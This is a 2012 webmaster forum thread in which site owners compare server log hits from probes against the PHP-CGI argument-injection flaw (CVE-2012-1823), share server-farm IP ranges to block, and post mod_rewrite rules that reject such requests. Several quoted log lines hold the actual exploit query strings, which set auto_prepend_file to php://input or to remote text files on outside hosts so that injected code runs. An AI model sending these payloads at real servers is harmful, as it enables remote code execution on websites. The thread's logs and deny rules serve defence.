That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nsty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)

Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?

From the topic header:

why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.

The /?- start suggests that the root index file was involved.

dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.

Had the same request two days ago:

173.73.115.178 - - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

was denied based upon incorrect case or syntax on "Windows"

I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.

I never use underscores in URLs.

Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?

I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.

Block requests with underscore in path:

RewriteRule _ - [F]

I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.

That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.

[php.net...]

It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.

I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.

gg,

Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake google UA's" (especially this malformed one?

2) Linode is a server farm:
97.107.128.0 - 97.107.143.255

OT: More ranges on LINODE server farm.

LINODE-US (NET6-2600-3C00-1) 2600:3C00:: - 2600:3C03:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
LINODE-US (NET-173-230-128-0-1) 173.230.128.0 - 173.230.159.255
LINODE-US (NET-173-255-192-0-1) 173.255.192.0 - 173.255.255.255
LINODE-US (NET-50-116-0-0-1) 50.116.0.0 - 50.116.63.255
LINODE-US (NET-66-228-32-0-1) 66.228.32.0 - 66.228.63.255
LINODE-US (NET-69-164-192-0-1) 69.164.192.0 - 69.164.223.255
LINODE-US (NET-72-14-176-0-1) 72.14.176.0 - 72.14.191.255
LINODE-US (NET-74-207-224-0-1) 74.207.224.0 - 74.207.255.255
LINODE-US (NET-96-126-96-0-1) 96.126.96.0 - 96.126.127.255
LINODE-US (NET-97-107-128-0-1) 97.107.128.0 - 97.107.143.255

I have a couple of extras on that list...

50.116.0.0 - 50.116.63.255
66.228.32.0 - 66.228.63.255
69.164.192.0 - 69.164.223.255
72.14.176.0 - 72.14.191.255
74.207.224.0 - 74.207.255.255
96.126.96.0 - 96.126.127.255
97.107.128.0 - 97.107.143.255
109.74.192.0 - 109.74.207.255 (UK)
173.230.128.0 - 173.230.159.255
173.255.192.0 - 173.255.255.255
178.79.128.0 - 178.79.191.255

2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - 108.49.215.253 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

108.49.215.253(Verizon Online LLC) trying to inject info3.txt from 81.17.24.82(privatelayer.com.pa - server farm)

81.17.24.82 - not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete 81.17.16.0/20 blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range (108.0.0.0-108.57.255.255) that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.

Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"

It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).

[stopmalvertising.com...]

When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.

[eindbazen.net...]

If you are vulnerable the following directive might help:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try a RFI (Remote File Inclusion) which is a shell most of the time.

Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]

2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - 83.155.50.106 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that IP its pointing to is UP by one from my prev post on this. This is from a different site than the prev one.